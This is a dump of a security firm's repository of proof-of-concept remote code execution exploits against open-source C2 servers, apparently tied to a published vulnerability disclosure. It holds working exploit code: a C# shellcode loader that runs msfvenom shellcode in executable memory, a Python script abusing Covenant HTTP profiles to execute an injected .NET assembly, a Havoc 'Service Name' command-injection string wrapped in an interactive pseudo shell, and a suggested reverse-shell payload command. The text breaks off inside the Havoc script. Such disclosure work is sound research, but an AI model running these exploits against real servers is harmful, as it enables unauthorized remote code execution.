├── README.md ├── covenant_priv_esc_auth_rce ├── README.md ├── ShellcodeAssembly │ ├── .gitignore │ ├── ShellcodeAssembly.sln │ └── ShellcodeAssembly │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── Shellcode.cs │ │ └── ShellcodeAssembly.csproj ├── covenant_rce.py └── poc.gif ├── havoc_auth_rce ├── README.md ├── demo.png ├── havoc_rce.py └── poc.gif ├── ninja_rce ├── README.md ├── ninja_poc.py └── poc.gif ├── shad0w_rce ├── README.md └── poc.gif └── sliver_auth_rce ├── README.md └── poc.gif /README.md: -------------------------------------------------------------------------------- 1 | # C2 Vulnerabilities 2 | 3 | PoCs of RCEs against open source C2 servers. 4 | 5 | See https://blog.includesecurity.com/2024/09/vulnerabilities-in-open-source-c2-frameworks/ 6 | -------------------------------------------------------------------------------- /covenant_priv_esc_auth_rce/README.md: -------------------------------------------------------------------------------- 1 | # Covenant Low Privileged User RCE 2 | 3 | ![](poc.gif) 4 | 5 | Both the current [master](https://github.com/cobbr/Covenant/tree/5decc3ccfab04e6e881ed00c9de649740dac8ad1) and [dev](https://github.com/cobbr/Covenant/tree/bcb9a6c79ff629f939e22bb314ff2d2d9a7fe7bb) branches of Covenant are vulnerable to an escalation of privilege from User to Administrator. The API [blocks editing roles](https://github.com/cobbr/Covenant/blob/5decc3ccfab04e6e881ed00c9de649740dac8ad1/Covenant/Controllers/ApiControllers/CovenantUserApiController.cs#L298) unless you are an Administrator, however in the UI itself it's [possible for a User to give themself the Administrator role](https://github.com/cobbr/Covenant/blob/5decc3ccfab04e6e881ed00c9de649740dac8ad1/Covenant/Components/CovenantUsers/EditCovenantUser.razor). 6 | 7 | With the Administrator role, the user has access to the most powerful feature of Covenant, the ability to create HTTP profiles. This feature is [restricted to Administrators](https://github.com/cobbr/Covenant/blob/5decc3ccfab04e6e881ed00c9de649740dac8ad1/Covenant/Core/CovenantService.cs#L3616). Although there is no built-in way to get a shell on a Covenant server, the HTTP profiles feature essentially enables running C# code on the server as a way of customizing traffic sent to and from implants. 8 | 9 | The C# code is limited by the fact that the built-in Covenant compiler [restricts the `System` namespace](https://github.com/cobbr/Covenant/blob/5decc3ccfab04e6e881ed00c9de649740dac8ad1/Covenant/Core/Common.cs#L85) to `System.Private.CoreLib.dll` which means `Process` can't be directly used. However [previous excellent research](https://web.archive.org/web/20220126104152/https://blog.null.farm/hunting-the-hunters) on Covenant by 0xcoastal found a blog post by Tim Malcolmvetter that showed that only the `Activator` and `Assembly` classes are required to perform process injection of arbitrary .NET assemblies. 10 | 11 | The privilege escalation part of this attack must be performed manually as only the Blazor UI is vulnerable and not the API, and the Blazor stuff is a pain to automate. 12 | 13 | The RCE is automated by `covenant_rce.py`, which interacts with the API to create a HTTP profile, a HTTP listener, then communicates with the listener to trigger a provided .NET assembly to run. 14 | 15 | ## Reproduction 16 | 17 | 1. In the Covenant UI, escalate privileges from User to Administrator by clicking Users -> Your Username -> Roles -> Administrator -> Edit Roles 18 | 2. In `covenant_rce.py`, edit variables at the top of the script 19 | 3. Generate csharp shellcode, e.g. `msfvenom -f csharp -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 EXITFUNC=thread` 20 | 4. Copy shellcode buffer into `Shellcode.cs` and compile the `ShellcodeAssembly` project in Release mode in Visual Studio 21 | 5. Run `python covenant_rce.py` 22 | 23 | ## References 24 | 25 | * https://web.archive.org/web/20220126104152/https://blog.null.farm/hunting-the-hunters 26 | * https://github.com/malcomvetter/ManagedInjection 27 | -------------------------------------------------------------------------------- /covenant_priv_esc_auth_rce/ShellcodeAssembly/.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.tlog 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio 6 auto-generated project file (contains which files were open etc.) 298 | *.vbp 299 | 300 | # Visual Studio 6 workspace and project file (working project files containing files to include in project) 301 | *.dsw 302 | *.dsp 303 | 304 | # Visual Studio 6 technical files 305 | *.ncb 306 | *.aps 307 | 308 | # Visual Studio LightSwitch build output 309 | **/*.HTMLClient/GeneratedArtifacts 310 | **/*.DesktopClient/GeneratedArtifacts 311 | **/*.DesktopClient/ModelManifest.xml 312 | **/*.Server/GeneratedArtifacts 313 | **/*.Server/ModelManifest.xml 314 | _Pvt_Extensions 315 | 316 | # Paket dependency manager 317 | .paket/paket.exe 318 | paket-files/ 319 | 320 | # FAKE - F# Make 321 | .fake/ 322 | 323 | # CodeRush personal settings 324 | .cr/personal 325 | 326 | # Python Tools for Visual Studio (PTVS) 327 | __pycache__/ 328 | *.pyc 329 | 330 | # Cake - Uncomment if you are using it 331 | # tools/** 332 | # !tools/packages.config 333 | 334 | # Tabs Studio 335 | *.tss 336 | 337 | # Telerik's JustMock configuration file 338 | *.jmconfig 339 | 340 | # BizTalk build output 341 | *.btp.cs 342 | *.btm.cs 343 | *.odx.cs 344 | *.xsd.cs 345 | 346 | # OpenCover UI analysis results 347 | OpenCover/ 348 | 349 | # Azure Stream Analytics local run output 350 | ASALocalRun/ 351 | 352 | # MSBuild Binary and Structured Log 353 | *.binlog 354 | 355 | # NVidia Nsight GPU debugger configuration file 356 | *.nvuser 357 | 358 | # MFractors (Xamarin productivity tool) working folder 359 | .mfractor/ 360 | 361 | # Local History for Visual Studio 362 | .localhistory/ 363 | 364 | # Visual Studio History (VSHistory) files 365 | .vshistory/ 366 | 367 | # BeatPulse healthcheck temp database 368 | healthchecksdb 369 | 370 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 371 | MigrationBackup/ 372 | 373 | # Ionide (cross platform F# VS Code tools) working folder 374 | .ionide/ 375 | 376 | # Fody - auto-generated XML schema 377 | FodyWeavers.xsd 378 | 379 | # VS Code files for those working on multiple tools 380 | .vscode/* 381 | !.vscode/settings.json 382 | !.vscode/tasks.json 383 | !.vscode/launch.json 384 | !.vscode/extensions.json 385 | *.code-workspace 386 | 387 | # Local History for Visual Studio Code 388 | .history/ 389 | 390 | # Windows Installer files from build outputs 391 | *.cab 392 | *.msi 393 | *.msix 394 | *.msm 395 | *.msp 396 | 397 | # JetBrains Rider 398 | *.sln.iml 399 | -------------------------------------------------------------------------------- /covenant_priv_esc_auth_rce/ShellcodeAssembly/ShellcodeAssembly.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.8.34330.188 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ShellcodeAssembly", "ShellcodeAssembly\ShellcodeAssembly.csproj", "{44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {44A1F6FE-64B5-41F2-9DCC-5134D12C2F12}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {DAB50E32-2EEA-4D1B-B2D4-599AD9C36CDE} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /covenant_priv_esc_auth_rce/ShellcodeAssembly/ShellcodeAssembly/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("ClassLibrary1")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ClassLibrary1")] 13 | [assembly: AssemblyCopyright("Copyright © 2024")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("44a1f6fe-64b5-41f2-9dcc-5134d12c2f12")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /covenant_priv_esc_auth_rce/ShellcodeAssembly/ShellcodeAssembly/Shellcode.cs: -------------------------------------------------------------------------------- 1 | // https://gist.github.com/matterpreter/03e2bd3cf8b26d57044f3b494e73bbea 2 | using System; 3 | using System.Runtime.InteropServices; 4 | 5 | namespace ShellcodeAssembly 6 | { 7 | public class Shellcode 8 | { 9 | public void Main(string[] args) 10 | { 11 | // msfvenom -f csharp -p windows/x64/exec CMD=calc.exe EXITFUNC=thread 12 | byte[] buf = new byte[276] {0xfc,0x48,0x83,0xe4,0xf0,0xe8, 13 | 0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48, 14 | 0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, 15 | 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a, 16 | 0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c, 17 | 0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41, 18 | 0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b, 19 | 0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, 20 | 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0, 21 | 0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6, 22 | 0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41, 23 | 0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45, 24 | 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, 25 | 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0, 26 | 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e, 27 | 0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20, 28 | 0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9, 29 | 0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, 30 | 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba, 31 | 0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41, 32 | 0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c, 33 | 0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72, 34 | 0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, 35 | 0x63,0x2e,0x65,0x78,0x65,0x00}; 36 | 37 | 38 | IntPtr funcAddr = VirtualAlloc( 39 | IntPtr.Zero, 40 | (ulong)buf.Length, 41 | (uint)StateEnum.MEM_COMMIT, 42 | (uint)Protection.PAGE_EXECUTE_READWRITE); 43 | Marshal.Copy(buf, 0, (IntPtr)(funcAddr), buf.Length); 44 | 45 | IntPtr hThread = IntPtr.Zero; 46 | uint threadId = 0; 47 | IntPtr pinfo = IntPtr.Zero; 48 | 49 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 50 | WaitForSingleObject(hThread, 0xFFFFFFFF); 51 | return; 52 | } 53 | 54 | #region pinvokes 55 | [DllImport("kernel32.dll")] 56 | private static extern IntPtr VirtualAlloc( 57 | IntPtr lpStartAddr, 58 | ulong size, 59 | uint flAllocationType, 60 | uint flProtect); 61 | 62 | [DllImport("kernel32.dll")] 63 | private static extern IntPtr CreateThread( 64 | uint lpThreadAttributes, 65 | uint dwStackSize, 66 | IntPtr lpStartAddress, 67 | IntPtr param, 68 | uint dwCreationFlags, 69 | ref uint lpThreadId); 70 | 71 | [DllImport("kernel32.dll")] 72 | private static extern uint WaitForSingleObject( 73 | IntPtr hHandle, 74 | uint dwMilliseconds); 75 | 76 | public enum StateEnum 77 | { 78 | MEM_COMMIT = 0x1000, 79 | MEM_RESERVE = 0x2000, 80 | MEM_FREE = 0x10000 81 | } 82 | 83 | public enum Protection 84 | { 85 | PAGE_READONLY = 0x02, 86 | PAGE_READWRITE = 0x04, 87 | PAGE_EXECUTE = 0x10, 88 | PAGE_EXECUTE_READ = 0x20, 89 | PAGE_EXECUTE_READWRITE = 0x40, 90 | } 91 | #endregion 92 | } 93 | } 94 | -------------------------------------------------------------------------------- /covenant_priv_esc_auth_rce/ShellcodeAssembly/ShellcodeAssembly/ShellcodeAssembly.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {44A1F6FE-64B5-41F2-9DCC-5134D12C2F12} 8 | Library 9 | Properties 10 | ShellcodeAssembly 11 | ShellcodeAssembly 12 | v4.7.2 13 | 512 14 | true 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | pdbonly 27 | true 28 | bin\Release\ 29 | TRACE 30 | prompt 31 | 4 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /covenant_priv_esc_auth_rce/covenant_rce.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import random 3 | import requests 4 | import urllib3 5 | import uuid 6 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 7 | 8 | SERVER_URL = "192.168.0.227" 9 | COVENANT_PORT = 7443 10 | USERNAME = "hyper" 11 | PASSWORD = "admin" 12 | 13 | with open('./ShellcodeAssembly.dll', 'rb') as f: 14 | base64exploit = base64.b64encode(f.read()).decode() 15 | 16 | url = f"https://{SERVER_URL}:{COVENANT_PORT}" 17 | headers = { 18 | 'accept': 'text/plain', 19 | 'Content-Type': 'application/json-patch+json', 20 | } 21 | 22 | data = {"userName": USERNAME, "password": PASSWORD} 23 | 24 | s = requests.Session() 25 | 26 | response = s.post(f'{url}/api/users/login', 27 | headers=headers, json=data, verify=False) 28 | if not response.ok or not response.json()["success"]: 29 | print("Failed to login") 30 | print(response.text) 31 | exit() 32 | 33 | token = response.json()["covenantToken"] 34 | print(f"Fetched covenant token: {token}") 35 | 36 | headers["Authorization"] = f"Bearer {token}" 37 | 38 | transform = """public static class MessageTransform 39 | { 40 | public static string Transform(byte[] bytes) 41 | { 42 | return System.Convert.ToBase64String(bytes); 43 | } 44 | public static byte[] Invert(string str) 45 | { 46 | try 47 | { 48 | string assemblyBase64 = " """ + base64exploit + """ "; 49 | var assemblyBytes = System.Convert.FromBase64String(assemblyBase64); 50 | var assembly = System.Reflection.Assembly.Load(assemblyBytes); 51 | foreach (var type in assembly.GetTypes()) { 52 | object instance = System.Activator.CreateInstance(type); 53 | object[] args = new object[] { new string[] { "" } }; 54 | try { 55 | type.GetMethod("Main").Invoke(instance, args); 56 | } 57 | catch {} 58 | } 59 | } 60 | catch {} 61 | return System.Convert.FromBase64String(str); 62 | } 63 | } 64 | """ 65 | 66 | profile_id = random.randint(10000, 20000) 67 | profile_name = str(uuid.uuid4()) 68 | 69 | data = { 70 | "id": profile_id, 71 | "name": profile_name, 72 | "description": "", 73 | "type": "HTTP", 74 | "messageTransform": transform, 75 | 'httpUrls': [], 76 | 'httpRequestHeaders': [], 77 | 'httpResponseHeaders': [], 78 | 'httpPostRequest': 'd={DATA}', 79 | 'httpGetResponse': '\n \n Hello World!\n \n \n

Hello World!

\n // Hello World! {DATA}\n \n\n', 80 | 'httpPostResponse': '\n \n Hello World!\n \n \n

Hello World!

\n // Hello World! {DATA}\n \n\n', 81 | } 82 | 83 | response = s.post(f'{url}/api/profiles/http', 84 | headers=headers, json=data, verify=False) 85 | if not response.ok: 86 | print(response.text) 87 | exit() 88 | 89 | print(f"Created malicious profile name {profile_name}") 90 | 91 | listener_port = random.randint(49999, 60000) 92 | 93 | data = { 94 | "bindAddress": "0.0.0.0", 95 | "bindPort": listener_port, 96 | "connectAddresses": [ 97 | "0.0.0.0" 98 | ], 99 | "connectPort": listener_port, 100 | "profileId": profile_id, 101 | "listenerTypeId": 1, 102 | "status": "Active" 103 | } 104 | 105 | response = s.post(f'{url}/api/listeners/http', 106 | headers=headers, json=data, verify=False) 107 | if not response.ok: 108 | print(response.text) 109 | exit() 110 | 111 | print(f"Started Covenant listener on port {listener_port}") 112 | 113 | print(f"Sending payload to trigger invert") 114 | 115 | listener_url = f"http://{SERVER_URL}:{listener_port}" 116 | 117 | data = f'd=e30K' 118 | response = requests.post( 119 | f'{listener_url}/index.html?id=blabla', data=data, verify=False) 120 | print(response) 121 | print("Payload is triggered, 404 response to final request is expected") 122 | -------------------------------------------------------------------------------- /covenant_priv_esc_auth_rce/poc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/covenant_priv_esc_auth_rce/poc.gif -------------------------------------------------------------------------------- /havoc_auth_rce/README.md: -------------------------------------------------------------------------------- 1 | # Havoc RCE 2 | 3 | Havoc is vulnerable to command injection enabling an authenticated user to execute commands on the Teamserver. Affects versions 0.3 up to the latest release 0.6. Havoc's default profile contains hardcoded passwords, so a C2 operator careless enough to use the default profile on a public network can immediately be exploited. 4 | 5 | ![](poc.gif) 6 | 7 | The Havoc Teamserver can compile custom agents on behalf of users. The [builder code](https://github.com/HavocFramework/Havoc/blob/ea3646e055eb1612dcc956130fd632029dbf0b86/teamserver/pkg/common/builder/builder.go) eventually passes the full compilation options to an `exec.Command()` [invocation of `sh -c`](https://github.com/HavocFramework/Havoc/blob/ea3646e055eb1612dcc956130fd632029dbf0b86/teamserver/pkg/common/builder/builder.go#L1066). Input options are sanitized, apart from the ["Service Name" field](https://github.com/HavocFramework/Havoc/blob/ea3646e055eb1612dcc956130fd632029dbf0b86/teamserver/pkg/common/builder/builder.go#L617) when generating service binaries. 8 | 9 | ## Reproduction 10 | 11 | The `havoc_rce.py` PoC script automates the following steps and provides a pseudo shell (just set the variables at the top). 12 | 13 | 1. In the Havoc client UI, View > Listeners > Add (settings don't matter) 14 | 2. Go to Attack > Payload > Format Windows Service Exe 15 | 3. The injection is in the "Service Name" field, and should look something like `\" -mbla; CMD 1>&2 && false #`: 16 | - `\"` to exit out the quotes 17 | - `-mbla` to cause the MinGW compilation to fail and not have to wait for it 18 | - `CMD 1>&2` with the chosen payload redirected to stderr 19 | - `&& false` to cause the command to fail and the server to send back the stderr output 20 | - `#` to comment out the parameters after our injection 21 | 22 | -------------------------------------------------------------------------------- /havoc_auth_rce/demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/IncludeSecurity/c2-vulnerabilities/a91bef7db34deea10ea959183bb786d3d060c556/havoc_auth_rce/demo.png -------------------------------------------------------------------------------- /havoc_auth_rce/havoc_rce.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import json 3 | import ssl 4 | from websocket import create_connection # pip install websocket-client 5 | 6 | HOSTNAME = "192.168.167.129" 7 | PORT = 40056 8 | USER = "Neo" 9 | PASSWORD = "password1234" 10 | 11 | ws = create_connection(f"wss://{HOSTNAME}:{PORT}/havoc/", 12 | sslopt={"cert_reqs": ssl.CERT_NONE, "check_hostname": False}) 13 | 14 | # Authenticate to teamserver 15 | payload = {"Body": {"Info": {"Password": hashlib.sha3_256(PASSWORD.encode()).hexdigest(), "User": USER}, "SubEvent": 3}, "Head": {"Event": 1, "OneTime": "", "Time": "18:40:17", "User": USER}} 16 | ws.send(json.dumps(payload)) 17 | print(json.loads(ws.recv())) 18 | 19 | # Create a listener to build demon agent for 20 | payload = {"Body":{"Info":{"Headers":"","HostBind":"0.0.0.0","HostHeader":"","HostRotation":"round-robin","Hosts":"0.0.0.0","Name":"abc","PortBind":"443","PortConn":"443","Protocol":"Https","Proxy Enabled":"false","Secure":"true","Status":"online","Uris":"","UserAgent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"},"SubEvent":1},"Head":{"Event":2,"OneTime":"","Time":"08:39:18","User": USER}} 21 | ws.send(json.dumps(payload)) 22 | 23 | # Create a psuedo shell with RCE loop 24 | while True: 25 | cmd = input("$ ") 26 | injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #""" 27 | 28 | # Command injection in demon compilation command 29 | payload = {"Body": {"Info": {"AgentType": "Demon", "Arch": "x64", "Config": "{\n \"Amsi/Etw Patch\": \"None\",\n \"Indirect Syscall\": false,\n \"Injection\": {\n \"Alloc\": \"Native/Syscall\",\n \"Execute\": \"Native/Syscall\",\n \"Spawn32\": \"C:\\\\Windows\\\\SysWOW64\\\\notepad.exe\",\n \"Spawn64\": \"C:\\\\Windows\\\\System32\\\\notepad.exe\"\n },\n \"Jitter\": \"0\",\n \"Proxy Loading\": \"None (LdrLoadDll)\",\n \"Service Name\":\"" + injection + "\",\n \"Sleep\": \"2\",\n \"Sleep Jmp Gadget\": \"None\",\n \"Sleep 